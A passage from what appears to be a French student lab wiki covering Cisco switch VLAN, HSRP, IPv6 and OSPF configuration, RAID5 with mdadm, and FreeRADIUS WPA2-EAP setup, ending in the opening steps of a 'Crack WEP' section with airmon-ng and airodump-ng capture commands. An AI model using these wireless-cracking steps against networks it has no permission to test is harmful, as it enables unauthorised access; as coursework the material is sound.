 name groupe3&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 4&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan14&lt;br /&gt;
 int vlan14&lt;br /&gt;
 ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 14 ip 10.60.14.254&lt;br /&gt;
 standby 14 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 14&lt;br /&gt;
 name groupe4&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 5&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan15&lt;br /&gt;
 int vlan15&lt;br /&gt;
 ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 15 ip 10.60.15.254&lt;br /&gt;
 standby 15 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 15&lt;br /&gt;
 name groupe5&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan16&lt;br /&gt;
 int vlan16&lt;br /&gt;
 ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 16 ip 10.60.16.254&lt;br /&gt;
 standby 16 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 16&lt;br /&gt;
 name groupe6&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 7&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan17&lt;br /&gt;
 int vlan17&lt;br /&gt;
 ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 17 ip 10.60.17.254&lt;br /&gt;
 standby 17 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 17&lt;br /&gt;
 name groupe7&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 8&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan18&lt;br /&gt;
 int vlan18&lt;br /&gt;
 ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 18 ip 10.60.18.254&lt;br /&gt;
 standby 18 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 18&lt;br /&gt;
 name groupe8&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 9&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan19&lt;br /&gt;
 int vlan19&lt;br /&gt;
 ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 19 ip 10.60.19.254&lt;br /&gt;
 standby 19 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 19&lt;br /&gt;
 name groupe9&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 10&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan20&lt;br /&gt;
 int vlan20&lt;br /&gt;
 ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 20 ip 10.60.20.254&lt;br /&gt;
 standby 20 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 20&lt;br /&gt;
 name groupe10&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 11&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan21&lt;br /&gt;
 int vlan21&lt;br /&gt;
 ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 21 ip 10.60.21.254&lt;br /&gt;
 standby 21 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 21&lt;br /&gt;
 name groupe11&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérifications du fonctionnement =====&lt;br /&gt;
&lt;br /&gt;
====== show running-config ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show run &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 spanning-tree mode pvst&lt;br /&gt;
 spanning-tree loopguard default&lt;br /&gt;
 spanning-tree etherchannel guard misconfig&lt;br /&gt;
 spanning-tree extend system-id&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/3&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/4&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/5&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/6&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/7&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !         &lt;br /&gt;
 interface GigabitEthernet0/8&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/9&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/10&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/11&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface TenGigabitEthernet0/1&lt;br /&gt;
  switchport access vlan 131&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface TenGigabitEthernet0/2&lt;br /&gt;
  switchport access vlan 43&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan11&lt;br /&gt;
  ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 11 ip 10.60.11.254&lt;br /&gt;
  standby 11 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan12&lt;br /&gt;
  ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 12 ip 10.60.12.254&lt;br /&gt;
  standby 12 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan13&lt;br /&gt;
  ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 13 ip 10.60.13.254&lt;br /&gt;
  standby 13 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan14&lt;br /&gt;
  ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 14 ip 10.60.14.254&lt;br /&gt;
  standby 14 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan15&lt;br /&gt;
  ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 15 ip 10.60.15.254&lt;br /&gt;
  standby 15 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan16&lt;br /&gt;
  ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 16 ip 10.60.16.254&lt;br /&gt;
  standby 16 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan17&lt;br /&gt;
  ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 17 ip 10.60.17.254&lt;br /&gt;
  standby 17 preempt&lt;br /&gt;
 !         &lt;br /&gt;
 interface Vlan18&lt;br /&gt;
  ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 18 ip 10.60.18.254&lt;br /&gt;
  standby 18 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan19&lt;br /&gt;
  ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 19 ip 10.60.19.254&lt;br /&gt;
  standby 19 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan20&lt;br /&gt;
  ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 20 ip 10.60.20.254&lt;br /&gt;
  standby 20 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan21&lt;br /&gt;
  ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 21 ip 10.60.21.254&lt;br /&gt;
  standby 21 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan43&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 22 ip 193.48.57.190&lt;br /&gt;
  standby 22 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan131&lt;br /&gt;
  ip address 192.168.222.9 255.255.255.248&lt;br /&gt;
  ipv6 address FE80::2 link-local&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 rip tpima2a5 enable&lt;br /&gt;
 !&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 router rip tpima5sc&lt;br /&gt;
  redistribute connected metric 1&lt;br /&gt;
  redistribute static metric 1&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
====== Show Interface status ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show int status &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Port      Name               Status       Vlan       Duplex  Speed Type&lt;br /&gt;
 Gi0/1                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/2                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/3                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/4                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/5                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/6                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/7                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/8                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/9                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/10                       connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/11                       connected    trunk      a-full a-1000 10/100/1000BaseTX            // Vers C2&lt;br /&gt;
 &lt;br /&gt;
 Gi0/12                       notconnect   1            auto   auto 10/100/1000BaseTX            // Borne Wi-Fi du groupe 1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/13                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/14                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 [...]                        //           //           //     //   //&lt;br /&gt;
 Gi0/47                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/48                       notconnect   1            auto   auto 10/100/1000BaseTX  &lt;br /&gt;
           &lt;br /&gt;
 Te0/1                        connected    131          full    10G 10GBase-SR                   // Vers SR52&lt;br /&gt;
 Te0/2                        connected    43           full    10G 10GBase-SR                   // Vers Cordouan&lt;br /&gt;
&lt;br /&gt;
====== IPv6 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ipv6 route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Switch#show ipv6 route&lt;br /&gt;
 IPv6 Routing Table - Default - 53 entries&lt;br /&gt;
 Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
        B - BGP, R - RIP, D - EIGRP, EX - EIGRP external&lt;br /&gt;
        O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
        ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2&lt;br /&gt;
 R   ::/0 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6007::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6008::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6009::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6011::/64 [120/2]&lt;br /&gt;
&lt;br /&gt;
====== IPv4 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ip route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons bien de l'OSPF ('''O''') et OSPF NSSA external type 2 ('''E2''')&lt;br /&gt;
&lt;br /&gt;
 Switch#sh ip route&lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
      193.51.182.0/30 is subnetted, 1 subnets&lt;br /&gt;
 O E2    193.51.182.108 [110/20] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.12.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.29.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.28.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
      193.48.63.0/24 is variably subnetted, 2 subnets, 2 masks&lt;br /&gt;
 O E2    193.48.63.0/26 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O IA    193.48.63.1/32 [110/13] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O IA 193.49.225.0/24 [110/3] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
      192.168.44.0/29 is subnetted, 4 subnets&lt;br /&gt;
 O E2    192.168.44.0 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.8 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.32 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
&lt;br /&gt;
====Sécurisation des données via RAID5====&lt;br /&gt;
=====Les partitions=====&lt;br /&gt;
&lt;br /&gt;
Création des trois partitions 1G,&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part1 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part2 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part3 virtual&lt;br /&gt;
&lt;br /&gt;
Ajout de ces partitions lors de la création de la VM, dans le fichier Dionysos.cfg:&lt;br /&gt;
  &lt;br /&gt;
  disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w'&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part1,xvdf1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part2,xvdg1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part3,xvdh1,w',&lt;br /&gt;
  ]&lt;br /&gt;
&lt;br /&gt;
=====Création du RAID=====&lt;br /&gt;
Création du RAID5 à l'aide de mdadm&lt;br /&gt;
  sudo mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1&lt;br /&gt;
&lt;br /&gt;
Lors du premier essai l'erreur suivante est apparue  &lt;br /&gt;
  mdadm: cannot open /dev/xvdf1: Device or resource busy&lt;br /&gt;
&lt;br /&gt;
Après quelques recherches, j'ai consulté le fichier /proc/mdstat&lt;br /&gt;
  root@Dionysos:~# cat /proc/mdstat&lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md127 : active (auto-read-only) raid5 xvdg1[0] xvdf1[2]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
        &lt;br /&gt;
  unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'ai donc arrêté md127 grâce à &lt;br /&gt;
   mdadm --stop /dev/md127&lt;br /&gt;
&lt;br /&gt;
Puis j'ai relancé la commande de création du RAID&lt;br /&gt;
&lt;br /&gt;
En relisant /proc/mdstat, j'ai obtenu &lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md0 : active raid5 xvdh1[2] xvdg1[1] xvdf1[0]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Daemonisation du volume RAID, pour que la VM le charge à chaque redémarrage&lt;br /&gt;
  mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
On formate le RAID&lt;br /&gt;
  root@Dionysos:~#mkfs.ext4 /dev/md0&lt;br /&gt;
  mke2fs 1.44.4 (18-Aug-2018)&lt;br /&gt;
  Creating filesystem with 523264 4k blocks and 130816 inodes&lt;br /&gt;
  Filesystem UUID: e7b32d68-7297-4957-9104-574fff233b93&lt;br /&gt;
  Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912&lt;br /&gt;
  &lt;br /&gt;
  Allocating group tables: done                            &lt;br /&gt;
  Writing inode tables: done                            &lt;br /&gt;
  Creating journal (8192 blocks): done&lt;br /&gt;
  Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, nous demandons à notre VM de monter le volume à chaque redémarrage&lt;br /&gt;
  /dev/md0        /media/raid     ext4     defaults       0       1&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier&lt;br /&gt;
  mkdir /media/raid&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous créons un simple fichier texte blabla.txt&lt;br /&gt;
&lt;br /&gt;
Comme demandé dans le sujet, j'ai arrêté ma VM. Puis je l'ai relancée, en désactivant une des partitions : xvdh1&lt;br /&gt;
&lt;br /&gt;
Résultat, dans le dossier /media/raid&lt;br /&gt;
  root@Dionysos:/media/raid# ls&lt;br /&gt;
  lost+found&lt;br /&gt;
&lt;br /&gt;
====Sécurisation Wifi par WPA2-EAP====&lt;br /&gt;
&lt;br /&gt;
Installation de freeradius &lt;br /&gt;
  apt-get install freeradius&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/freeradius/3.0/users on ajoute la ligne&lt;br /&gt;
&lt;br /&gt;
  Dionysos Cleartext-Password :=NOTRE_MDP_ROOT&lt;br /&gt;
&lt;br /&gt;
Le serveur doit être configuré en PEAP-MSCHAPv2. Nous devons modifier :&lt;br /&gt;
&lt;br /&gt;
-/etc/freeradius/3.0/mods-enabled/eap&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
-etc/freeradius/3.0/mods-enabled/mschap&lt;br /&gt;
  mschap {&lt;br /&gt;
     ...&lt;br /&gt;
     use_mppe = yes&lt;br /&gt;
     require_encryption = yes&lt;br /&gt;
     require_strong = yes&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
Dans cette même section nous ajoutons la ligne  &lt;br /&gt;
  with_ntdomain_hack = yes&lt;br /&gt;
&lt;br /&gt;
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :&lt;br /&gt;
client 192.168.0.10/32&lt;br /&gt;
{&lt;br /&gt;
  secret = secretIMA5SC&lt;br /&gt;
  shortname = accesDionysos&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
====Crack WEP====&lt;br /&gt;
&lt;br /&gt;
* récuperer l'interface wifi&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
* mettre l'interface en écoute et récupérer le nouveau nom de l'interface (&amp;lt;interface2&amp;gt;)&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer le '''Channel''' et le '''BSSID'''&lt;br /&gt;
&lt;br /&gt;
 airodump &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer des &amp;lt;code&amp;gt;#Data&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c &amp;lt;CHANNEL&amp;gt; --bssid &amp;lt;BSSID&amp;gt; -w crack_wep &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
